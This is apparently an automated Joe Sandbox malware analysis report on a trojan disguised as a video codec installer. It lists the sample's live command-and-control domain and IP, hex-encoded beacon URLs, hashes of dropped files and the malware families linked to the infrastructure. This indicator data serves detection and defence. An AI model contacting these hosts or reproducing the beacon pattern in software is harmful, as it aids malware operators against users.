        C:\Users\user\AppData\Local\Zexter Video Codec\libpcre-1.dll (copy)0%ReversingLabs
        No Antivirus matches
Source | Detection | Scanner | Label
signup.live.com | 0% | Virustotal
Source | Detection | Scanner | Label
http://www.innosetup.com/ | 0% | URL Reputation | safe
http://www.remobjects.com/ps | 0% | URL Reputation | safe
http://www.freedesktop.org/standards/desktop-bookmarks | 0% | Virustotal
http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd-//OASIS//DTD | 0% | Virustotal
http://purl.oclc.org/dsdl/schematron | 0% | Virustotal
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ezebtfp.ua | 185.208.158.248 | true | true | | unknown
signup.live.com | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://ezebtfp.ua/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c445db22f31df92d8838ed12a666d307eca743ec4c2b07b5296692396087fc16c6ef91 | true | | unknown
ezebtfp.ua | true | | unknown
http://ezebtfp.ua/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c874b875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b416e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c7e6969d3dcd6b | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.innosetup.com/ | L9rm7AX4mp.tmp, L9rm7AX4mp.tmp, 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-1611L.tmp.1.dr, L9rm7AX4mp.tmp.0.dr | false | URL Reputation: safe | unknown
http://185.208.158.248/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86ee9c8 | zextervideocodec32_64.exe, 00000003.00000002.3288010011.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, zextervideocodec32_64.exe, 00000003.00000002.3289222096.0000000003509000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://freedesktop.orgtypenameexeccounttimestampparse_data- | is-TNU6F.tmp.1.dr | false | | unknown
http://WWW-Authenticate:Proxy-Authenticate:Content-Encoding:gzip1.2.8Content-Length:-/recv | is-FGQU3.tmp.1.dr | false | | unknown
http://185.258.2 | zextervideocodec32_64.exe, 00000003.00000002.3289384542.00000000035BB000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.freedesktop.org/standards/desktop-bookmarks | is-TNU6F.tmp.1.dr | false | | unknown
http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd | is-FGQU3.tmp.1.dr | false | | unknown
http://www.oasis-open.org/committees/entity/release/1.0/catalog.dtd-//OASIS//DTD | is-FGQU3.tmp.1.dr | false | | unknown
http://purl.oclc.org/dsdl/schematron | is-FGQU3.tmp.1.dr | false | | unknown
http://gcc.gnu.org/bugs.html): | is-9G1LK.tmp.1.dr | false | | unknown
http://relaxng.org/ns/structure/1.0definenameincludegrammarxmlRelaxNGParse: | is-FGQU3.tmp.1.dr | false | | unknown
http://www.ascc.net/xml/schematron | is-FGQU3.tmp.1.dr | false | | unknown
http://www.freedesktop.org/standards/dbus/1.0/introspect.dtd | is-2DT7G.tmp.1.dr | false | | unknown
http://185.208.158.248/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82d | zextervideocodec32_64.exe, 00000003.00000002.3288010011.0000000000881000.00000004.00000020.00020000.00000000.sdmp, zextervideocodec32_64.exe, 00000003.00000002.3289222096.00000000034F0000.00000004.00000020.00020000.00000000.sdmp, zextervideocodec32_64.exe, 00000003.00000002.3288010011.00000000008BA000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://tukaani.org/ | is-4BT74.tmp.1.dr | false | | unknown
http://www.remobjects.com/psU | L9rm7AX4mp.exe, 00000000.00000003.2037781035.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.exe, 00000000.00000003.2037603002.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-1611L.tmp.1.dr, L9rm7AX4mp.tmp.0.dr | false | | unknown
http://tukaani.org/xz/ | is-4BT74.tmp.1.dr | false | | unknown
http://mingw-w64.sourceforge.net/X | is-61SBR.tmp.1.dr | false | | unknown
http://www.freedesktop.org/standards/shared-mime-info | is-TNU6F.tmp.1.dr | false | | unknown
http://185.2 | zextervideocodec32_64.exe, 00000003.00000002.3289384542.00000000035BB000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.freedesktop.org/standards/desktop-bookmarksapplicationgroupapplicationsgroupsprivateiconh | is-TNU6F.tmp.1.dr | false | | unknown
http://relaxng.org/ns/structure/1.0 | is-FGQU3.tmp.1.dr | false | | unknown
http://www.remobjects.com/ps | L9rm7AX4mp.exe, 00000000.00000003.2037781035.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.exe, 00000000.00000003.2037603002.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, L9rm7AX4mp.tmp, 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-1611L.tmp.1.dr, L9rm7AX4mp.tmp.0.dr | false | URL Reputation: safe | unknown
http://fsf.org/ | L9rm7AX4mp.exe, 00000000.00000002.3287835540.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.exe, 00000000.00000003.2036923371.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039536568.0000000002090000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039453112.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3288142332.0000000002084000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3287918641.000000000085B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://freedesktop.org | is-TNU6F.tmp.1.dr | false | | unknown
http://purl.oclc.org/dsdl/schematronpathhttp://www.ascc.net/xml/schematron:node | is-FGQU3.tmp.1.dr | false | | unknown
http://www.gnu.org/licenses/ | L9rm7AX4mp.exe, 00000000.00000002.3287835540.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.exe, 00000000.00000003.2036923371.00000000023E0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039536568.0000000002090000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039453112.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3288142332.0000000002084000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3287918641.000000000085B000.00000004.00000020.00020000.00000000.sdmp, is-K2QCH.tmp.1.dr, is-LP383.tmp.1.dr | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.208.158.248 | ezebtfp.ua | Switzerland | 34888 | SIMPLECARRER2IT | true
89.105.201.183 | unknown | Netherlands | 24875 | NOVOSERVE-ASNL | false
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1524739
                                                            Start date and time:2024-10-03 08:38:11 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 6m 31s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:6
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:L9rm7AX4mp.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:0396163369529cd5b010e3c35a2066c5.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.evad.winEXE@5/154@3/2
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 91%
                                                            • Number of executed functions: 196
                                                            • Number of non-executed functions: 245
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded IPs from analysis (whitelisted): 13.107.42.22
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, l-0013.l-msedge.net, ctldl.windowsupdate.com, account.msa.msidentity.com, account.msa.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
02:39:38 | API Interceptor | 451715x Sleep call for process: zextervideocodec32_64.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.208.158.248:
  noode.exe | malicious | Socks5Systemz
  noode.exe | malicious | Socks5Systemz
  file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz
  file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz
  SecuriteInfo.com.Trojan.Win32.Crypt.31282.17969.exe | malicious | Socks5Systemz
  SecuriteInfo.com.Gen.Heur.Munp.1.15479.6612.exe | malicious | Socks5Systemz
  file.exe | malicious | Clipboard Hijacker, Cryptbot, Neoreklami, Socks5Systemz
  file.exe | malicious | Socks5Systemz
  boSodF2WmT.exe | malicious | Socks5Systemz
  file.exe | malicious | Socks5Systemz
89.105.201.183:
  cv viewer plugin 8.31.40.exe | malicious | Socks5Systemz | 200
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NOVOSERVE-ASNL:
  noode.exe | malicious | Socks5Systemz | 89.105.201.183
  file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz | 89.105.201.183
  SecuriteInfo.com.Gen.Heur.Munp.1.20199.21407.exe | malicious | Socks5Systemz | 89.105.201.183
  SecuriteInfo.com.Gen.Heur.Munp.1.15479.6612.exe | malicious | Socks5Systemz | 89.105.201.183
  file.exe | malicious | Clipboard Hijacker, Cryptbot, Neoreklami, Socks5Systemz | 89.105.201.183
  file.exe | malicious | Socks5Systemz | 89.105.201.183
  boSodF2WmT.exe | malicious | Socks5Systemz | 89.105.201.183
  file.exe | malicious | Socks5Systemz | 89.105.201.183
  mfRfEQGtYF.exe | malicious | Socks5Systemz | 89.105.201.183
  oFzEHfD9N6.exe | malicious | Socks5Systemz | 89.105.201.183
SIMPLECARRER2IT:
  noode.exe | malicious | Socks5Systemz | 185.208.158.248
  http://Asm.alcateia.org | malicious | HTMLPhisher | 185.208.158.9
  noode.exe | malicious | Socks5Systemz | 185.208.158.248
  file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz | 185.208.158.248
  file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz | 185.208.158.248
  SecuriteInfo.com.Trojan.Win32.Crypt.31282.17969.exe | malicious | Socks5Systemz | 185.208.158.248
  SecuriteInfo.com.Gen.Heur.Munp.1.11072.7602.exe | malicious | Socks5Systemz | 185.196.8.214
  SecuriteInfo.com.Gen.Heur.Munp.1.20199.21407.exe | malicious | Socks5Systemz | 185.196.8.214
  SecuriteInfo.com.Gen.Heur.Munp.1.15479.6612.exe | malicious | Socks5Systemz | 185.208.158.248
  http://www.jp-area.com/beppu/rank.cgi?mode=link&id=218&url=https://0oenqK.startprogrammingnowbook.com | malicious | HTMLPhisher | 185.208.158.9
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\is-2SCAO.tmp\_isetup\_RegDLL.tmp:
  noode.exe | malicious | Socks5Systemz
  file.exe | malicious | Unknown
  noode.exe | malicious | Socks5Systemz
  file.exe | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz
  AX3-GUI-45.exe | malicious | Unknown
  file.exe | malicious | HTMLPhisher
  AX3-GUI-45.exe | malicious | Unknown
  qgdf1HLJno.exe | malicious | Socks5Systemz
  file.exe | malicious | Socks5Systemz
  file.exe | malicious | Socks5Systemz
                                                                                                    Process:C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2586624
                                                                                                    Entropy (8bit):6.983193640665711
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:v7mmNpaKaPVVldZRknn2/vg3FYPpWfidqm6tWz28g:v7mpKgNdZRknYg3Fo8OqmUWz28g
                                                                                                    MD5:4AC9B0BE70B6E01BFD47FFA47289DED7
                                                                                                    SHA1:A8E99F68A9DEA6F3C0A0767C4341716236D366E9
                                                                                                    SHA-256:A241C183E38754017F08936A0C6E71588EACAFC44C656110C071032F5B6FD159
                                                                                                    SHA-512:BA22F267944CB8FCB8729E99E62DB7EF27EAF38C2C613CD6C4106250EAABEC4546B387F465330410B006535B4DD9226FBDA12C22D6EC29795FC296C82E9C52A8
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    Reputation:low
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...`W.L..................".........(."......."...@...........................'......3(......................................."......p#..`............................................................................"..............................text.....".......".................`....rdata........".......".............@..@.data...8d....#..0....".............@....rsrc....b...p#..b....#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    File Type:ISO-8859 text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8
                                                                                                    Entropy (8bit):2.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:X/:v
                                                                                                    MD5:2F06210C13337BAED2500CE4A8F0ADB2
                                                                                                    SHA1:E8A26D66FBA435248B76BFFE5D15F31550A95D78
                                                                                                    SHA-256:86A48BA39C30FF0A4AE4463C76215FAD84D1DBDDAE619A9D3B70D28015807FF1
                                                                                                    SHA-512:711D3AD2E4BEE488DB0F37133CAC09D248E896A0A68D9079857220CAE6A5FDC360129C2E6ECD780701117A7259514CBFEC781E2E7F9072CC96B8ED83EA7F5E42
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:D<.f....
                                                                                                    Process:C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):0.8112781244591328
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:q:q
                                                                                                    MD5:14CB44A8EE0BB0AA43F9C59CEDBEFA31
                                                                                                    SHA1:E5132D2015F3F9DBB4EC2449BAC2514B9FE5FFE8
                                                                                                    SHA-256:2EA111B9F81F7210FEFEA434E9A0BA054543754D83CE8368156138F22EB36134
                                                                                                    SHA-512:3DC09D5FAFA204053F2D2B7F6D6008B614A08EBD5D8488E948906B9CC7620773F661D899B8C8D94022CEF6C6599D80457A3F6E2317DEC6E18A9ED579C23BA6E9
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:[...
                                                                                                    Process:C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):128
                                                                                                    Entropy (8bit):2.9545817380615236
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                                                    MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                                                    SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                                                    SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                                                    SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):128
                                                                                                    Entropy (8bit):1.7095628900165245
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:LDXdQSWBdMUE/:LLdQSGd
                                                                                                    MD5:4FFFD4D2A32CBF8FB78D521B4CC06680
                                                                                                    SHA1:3FA6EFA82F738740179A9388D8046619C7EBDF54
                                                                                                    SHA-256:EC52F73A17E6AFCF78F3FD8DFC7177024FEB52F5AC2B602886788E4348D5FB68
                                                                                                    SHA-512:130A074E6AD38EEE2FB088BED2FCB939BF316B0FCBB4F5455AB49C2685BEEDCB5011107A22A153E56BF5E54A45CA4801C56936E71899C99BA9A4F694A1D4CC6D
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:dad6f9fa0c8327344d1aa24f183c3767................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4096
                                                                                                    Entropy (8bit):4.026670007889822
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                                                    MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                                                    SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                                                    SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                                                    SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: noode.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: noode.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: AX3-GUI-45.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: AX3-GUI-45.exe, Detection: malicious, Browse
                                                                                                    • Filename: qgdf1HLJno.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2560
                                                                                                    Entropy (8bit):2.8818118453929262
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                                    MD5:A69559718AB506675E907FE49DEB71E9
                                                                                                    SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                                    SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                                    SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13312
                                                                                                    Entropy (8bit):5.745960477552938
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
                                                                                                    MD5:A813D18268AFFD4763DDE940246DC7E5
                                                                                                    SHA1:C7366E1FD925C17CC6068001BD38EAEF5B42852F
                                                                                                    SHA-256:E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
                                                                                                    SHA-512:B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6144
                                                                                                    Entropy (8bit):4.215994423157539
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                                    MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                                    SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                                    SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                                    SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23312
                                                                                                    Entropy (8bit):4.596242908851566
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                    MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                    SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                    SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                    SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Process:C:\Users\user\Desktop\L9rm7AX4mp.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):709120
                                                                                                    Entropy (8bit):6.498750714093575
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:thu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyF:Pu7eEYCP8trP837szHUA60SLtcV3E9kT
                                                                                                    MD5:16C9D19AB32C18671706CEFEE19B6949
                                                                                                    SHA1:FCA23338CB77068E1937DF4E59D9C963C5548CF8
                                                                                                    SHA-256:C1769524411682D5A204C8A40F983123C67EFEADB721160E42D7BBFE4531EB70
                                                                                                    SHA-512:32B4B0B2FB56A299046EC26FB41569491E8B0CD2F8BEC9D57EC0D1AD1A7860EEC72044DAB2D5044CB452ED46E9F21513EAB2171BAFA9087AF6D2DE296455C64B
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1606715
                                                                                                    Entropy (8bit):6.432733703292802
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:qi0l5PSkLHq6M30RmWXD4cE/TpXy4CEJQwAj7/RyYijPIDEFIgX3zdHyqFMa:eSqVMkRm3dyEYiGEFTdfFN
                                                                                                    MD5:34007E6F8E18D371DBFF19A279B008C3
                                                                                                    SHA1:58B091382EB981587CA6FDFAFC314E458598B8BB
                                                                                                    SHA-256:44D65416BB7EC0F43CE91927B33002CDF3E56038562F83E602C19A20C48AEB7D
                                                                                                    SHA-512:37F6338CDEA6220CF9079F25F760A2C7A50A01BD6A98C01798D20203F5A56FA0F37CDD7E91AE246C1077A34EC4FA42E9D2305ADA7CA8945E6591C8E26164C906
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):92019
                                                                                                    Entropy (8bit):5.974787373427489
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:+j80nVGEhJyBnvQXUDkUPoWCSgZosDGMsZLXWU9+HN4yoRtJJ:C8IgtyUDkBWIZosDGDBXWPHN4yoRtJJ
                                                                                                    MD5:CC7DAD980DD04E0387795741D809CBF7
                                                                                                    SHA1:A49178A17B1C72AD71558606647F5011E0AA444B
                                                                                                    SHA-256:0BAE9700E29E4E7C532996ADF6CD9ADE818F8287C455E16CF2998BB0D02C054B
                                                                                                    SHA-512:E4441D222D7859169269CA37E491C37DAA6B3CDD5F4A05A0A246F21FA886F5476092E64DFF88890396EF846B9E8D2880E33F1F594CD61F09023B3EF4CD573EA3
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):171848
                                                                                                    Entropy (8bit):6.579154579239999
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:LrhG5+L/AcY680k2SxVqetJP5Im+A9mNoWqlM5ywwoS:LV6+LA0G0enP5PFYOWi6w1
                                                                                                    MD5:236A679AB1B16E66625AFBA86A4669EB
                                                                                                    SHA1:73AE354886AB2609FFA83429E74D8D9F34BD45F2
                                                                                                    SHA-256:B1EC758B6EDD3E5B771938F1FEBAC23026E6DA2C888321032D404805E2B05500
                                                                                                    SHA-512:C19FA027E2616AC6B4C18E04959DFE081EF92F49A11260BA69AFE10313862E8FEFF207B9373A491649928B1257CF9B905F24F073D11D71DCD29B0F9ADAC80248
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ......;......#...............................c................................q......... .........................,.......<.......H...........................................................................(................................text...............................`.P`.data... ...........................@.0..rdata..|y.......z..................@.`@/4......HN...@...P... ..............@.0@.bss..................................`..edata..,............p..............@.0@.idata..<............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...H...........................@.0..reloc..............................@.0B........................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):463112
                                                                                                    Entropy (8bit):6.363613724826455
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:qyoSS9Gy176UixTUTfeKEVfA/K4FW0BGXOjY:pS93176nxTUTEA/Kuk
                                                                                                    MD5:D9D9C79E35945FCA3F9D9A49378226E7
                                                                                                    SHA1:4544A47D5B9765E5717273AAFF62724DF643F8F6
                                                                                                    SHA-256:18CBD64E56CE58CE7D1F67653752F711B30AD8C4A2DC4B0DE88273785C937246
                                                                                                    SHA-512:B0A9CEFAC7B4140CC07E880A336DCBAB8B6805E267F4F8D9423111B95E4D13544D8952D75AB51ADE9F6DACE93A5425E6D41F42C2AA88D3A3C233E340EE785EB9
                                                                                                    Malicious:true
                                                                                                    Antivirus:
